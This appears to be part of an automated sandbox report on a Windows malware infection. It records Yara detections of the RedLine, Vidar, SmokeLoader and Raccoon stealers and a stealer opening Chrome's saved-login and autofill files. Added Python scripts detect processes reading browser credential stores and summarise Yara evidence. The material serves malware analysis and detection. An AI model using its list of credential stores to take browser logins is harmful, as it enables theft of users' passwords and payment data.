Source: C:\Users\user\AppData\Local\Temp\B096.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\BBE1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Queries volume information: C:\Users\user\AppData\Local\Temp\DF3A.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Queries volume information: C:\Users\user\AppData\Local\Temp\DF3A.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 0_2_00421CF0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00421CF0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B574020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 29_2_6B574020

Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match File source: 40.0.ServiceModelReg.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.DF3A.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.ServiceModelReg.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.DF3A.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.DF3A.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.ServiceModelReg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.ServiceModelReg.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.aspnet_state.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.B096.exe.4426e00.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.B096.exe.4446e20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.DF3A.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.aspnet_state.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.aspnet_state.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.aspnet_state.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.aspnet_state.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.B096.exe.4446e20.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.aspnet_state.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.DF3A.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.B096.exe.4426e00.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.488918061.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.483819247.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.507631653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.439226875.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.480873861.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.438304869.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.439894383.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.440496476.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.488076798.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.483001107.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.503371064.0000000003E09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.466743057.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.484896100.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.487377447.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 29.3.CBF0.exe.3080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.CBF0.exe.3070e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.CBF0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.21.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Md0q201V1D.exe.2d815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.1.21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.gbhudtb.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.gbhudtb.2be15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.21.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.21.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.21.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.326584645.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.400930179.0000000002061000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.438106147.0000000003080000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.449845582.0000000000561000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.449446646.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.338103224.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.481901309.00000000048F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.453324146.00000000031C1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.453199313.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.338316447.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.480747015.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 35.3.C066.exe.4960000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\C066.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\C066.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
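The two file opens above are the behavioural core of a credential stealer: a process that is not a browser reading Chromium's Login Data (saved logins) and Web Data (autofill, payment cards) out of a browser profile. The following is an added detection example, not Joe Sandbox code and not from the report. It runs over constructed file-open events; the field names Image, ProcessId and TargetFilename, the browser allow-list and the set of credential-store file names are the editor's assumptions.

```python
"""Flag non-browser processes that open browser credential stores.

Added example; not part of the sandbox report. Event field names
(Image, ProcessId, TargetFilename), the browser allow-list and the store
names below are assumptions, not something the report states.
"""
import ntpath  # Windows path semantics regardless of the host OS
import re

# File names a stealer reads out of a browser profile. The first two are the
# ones the report shows C066.exe opening; the rest are common companions.
CREDENTIAL_STORES = {
    "login data": "chromium saved logins",
    "web data": "chromium autofill and payment data",
    "cookies": "chromium cookies",
    "logins.json": "firefox saved logins",
    "key4.db": "firefox key database",
}

# Assumed allow-list of images expected to touch their own profile files.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "firefox.exe"}

# Only fire inside a real profile directory, not on a stray copy elsewhere.
PROFILE_DIR = re.compile(r"\\(User Data|Profiles)\\", re.IGNORECASE)


def classify(event):
    """Return an alert dict for a suspicious credential-store open, else None."""
    image = ntpath.basename(event["Image"]).lower()
    target = event["TargetFilename"]
    name = ntpath.basename(target).lower()
    if name not in CREDENTIAL_STORES or not PROFILE_DIR.search(target):
        return None
    if image in BROWSER_IMAGES:
        return None  # the browser reading its own profile: expected
    return {
        "pid": event["ProcessId"],
        "image": image,
        "store": CREDENTIAL_STORES[name],
        "path": target,
    }


def scan(events):
    """Run classify() over a list of events and keep only the alerts."""
    return [alert for alert in map(classify, events) if alert]


# Constructed sample events modelled on the report's two file opens.
SAMPLE_EVENTS = [
    {"ProcessId": 5604, "Image": r"C:\Users\user\AppData\Local\Temp\C066.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"ProcessId": 5604, "Image": r"C:\Users\user\AppData\Local\Temp\C066.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"},
    {"ProcessId": 4120, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"ProcessId": 5604, "Image": r"C:\Users\user\AppData\Local\Temp\C066.exe",
     "TargetFilename": r"C:\Windows\System32\ntdll.dll"},
    {"ProcessId": 3344, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\user\Downloads\Login Data"},
    {"ProcessId": 7012, "Image": r"C:\Users\user\AppData\Roaming\svchost.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ab12cd34.default\logins.json"},
]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The image-name allow-list is the weak point of this rule: a stealer can name itself chrome.exe or inject into the real browser, so in production pair the check with the process tree and the signer of the image rather than its file name. Conversely, a non-browser copying the whole Login Data file out of the profile (stealers do this because the live database is locked) is caught here only because the source path is still inside User Data.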

Remote Access Functionality:

Yara detected RedLine Stealer
Source: Yara match File source: 40.0.ServiceModelReg.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.DF3A.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.ServiceModelReg.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.DF3A.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.DF3A.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.ServiceModelReg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.ServiceModelReg.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.aspnet_state.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.B096.exe.4426e00.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.B096.exe.4446e20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.DF3A.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.aspnet_state.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.aspnet_state.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.aspnet_state.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.aspnet_state.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.B096.exe.4446e20.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.aspnet_state.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.DF3A.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.B096.exe.4426e00.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.488918061.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.483819247.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.507631653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.439226875.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.480873861.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.438304869.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.439894383.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.440496476.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.488076798.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.483001107.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.503371064.0000000003E09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.466743057.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.484896100.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.487377447.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 29.3.CBF0.exe.3080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.CBF0.exe.3070e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.CBF0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.21.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Md0q201V1D.exe.2d815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.1.21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.gbhudtb.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.gbhudtb.2be15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.21.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.21.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.21.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.326584645.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.400930179.0000000002061000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.438106147.0000000003080000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.449845582.0000000000561000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.449446646.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.338103224.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.481901309.00000000048F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.453324146.00000000031C1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.453199313.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.338316447.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.480747015.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 35.3.C066.exe.4960000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR
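The Yara evidence above (listed once under Stealing of Sensitive Information and again here) is dense but regular, and the useful triage facts are buried in the source names: which sandbox process each family was found in, and whether the match came from a dump of a memory region that is both writable and executable, the usual footprint of an injected or hollowed payload. The decimal process number in the .unpack names (30 for aspnet_state.exe) is the same process as the hex prefix of the .sdmp names (0000001E), which lets the two kinds of evidence be joined. The script below is an added example by the editor, not Joe Sandbox's own tooling. It assumes the naming conventions process.stage.image.base.index[.raw].unpack and prochex.stagehex.id.base.protection.type.sdmp, and that the protection field holds a Windows PAGE_* constant, with 0x40 meaning PAGE_EXECUTE_READWRITE; the report does not document either.

```python
"""Summarise Joe Sandbox "Yara match" evidence lines per malware family.

Added example; this is not Joe Sandbox code. Assumptions not stated in the
report: UNPACKEDPE names are <proc>.<stage>.<image>.<base>.<index>[.raw].unpack,
.sdmp names are <proc hex>.<stage hex>.<id>.<base>.<protection>.<type>.sdmp, and
the protection field is a Windows PAGE_* constant (0x40 = PAGE_EXECUTE_READWRITE).
"""
import re
from collections import defaultdict

# Constructed sample: a subset of the report's own evidence lines.
SAMPLE = """\
Yara detected RedLine Stealer
Source: Yara match File source: 30.0.aspnet_state.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.ServiceModelReg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.B096.exe.4426e00.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.DF3A.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001E.00000002.466743057.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.503371064.0000000003E09000.00000004.00000001.sdmp, type: MEMORY
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Raccoon Stealer
Source: Yara match File source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR
"""

EVIDENCE = re.compile(r"^Source: Yara match File source: (.+), type: (\w+)$")
# Image names contain dots (aspnet_state.exe), so the image group is lazy and the
# hex base address plus numeric index that follow it disambiguate the split.
UNPACKED = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9a-fA-F]+)\.(\d+)(\.raw)?\.unpack$")
SDMP = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.\d+\.([0-9A-F]{16})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$")
MEMSTR = re.compile(r"^Process Memory Space: (\S+) PID: (\d+)$")

PAGE_EXECUTE_READWRITE = 0x40  # assumed meaning of the .sdmp protection field


def parse(text):
    """Yield (family, kind, source) for every evidence line.

    Any non-empty line that is not an evidence line is treated as the heading
    of the signature that the following evidence belongs to.
    """
    family, records = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = EVIDENCE.match(line)
        if m:
            records.append((family, m.group(2), m.group(1)))
        else:
            family = line
    return records


def summarise(text):
    """Per family: processes hit, RWX memory dumps, PCAP hit, and live PIDs."""
    records = parse(text)

    # First pass: learn sandbox process number -> image name from unpacked PEs,
    # so that memory dumps (which only carry the number) can be labelled.
    names = {}
    for _, kind, src in records:
        u = UNPACKED.match(src) if kind == "UNPACKEDPE" else None
        if u:
            names[int(u.group(1))] = u.group(3)

    summary = defaultdict(lambda: {"processes": {}, "rwx_dumps": [], "pcap": False, "pids": {}})
    for family, kind, src in records:
        entry = summary[family]
        if kind == "UNPACKEDPE":
            u = UNPACKED.match(src)
            if u:
                entry["processes"][int(u.group(1))] = u.group(3)
        elif kind == "MEMORY":
            s = SDMP.match(src)
            if s:
                proc = int(s.group(1), 16)  # hex prefix joins to the decimal .unpack number
                entry["processes"][proc] = names.get(proc, "?")
                if int(s.group(4), 16) == PAGE_EXECUTE_READWRITE:
                    entry["rwx_dumps"].append((proc, int(s.group(3), 16)))
        elif kind == "PCAP":
            entry["pcap"] = True
        elif kind == "MEMORYSTR":
            ms = MEMSTR.match(src)
            if ms:
                entry["pids"][int(ms.group(2))] = ms.group(1)
    return dict(summary)


if __name__ == "__main__":
    for family, entry in summarise(SAMPLE).items():
        print(family, entry)
```

On this report the interesting output is the RedLine line: four distinct processes carry the payload, and the memory hits sit at base 0x402000 in regions that are readable, writable and executable, which is what a .NET stealer looks like after it has been written into a hollowed host such as aspnet_state.exe. A match in dump.pcap only (Vidar) is weaker evidence than an unpacked PE, since it says the traffic pattern was seen but not which process produced it.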
[Map legend: countries shaded by share of contacted IPs, in quartiles: under 25%, 25% to 50%, 50% to 75%, over 75%]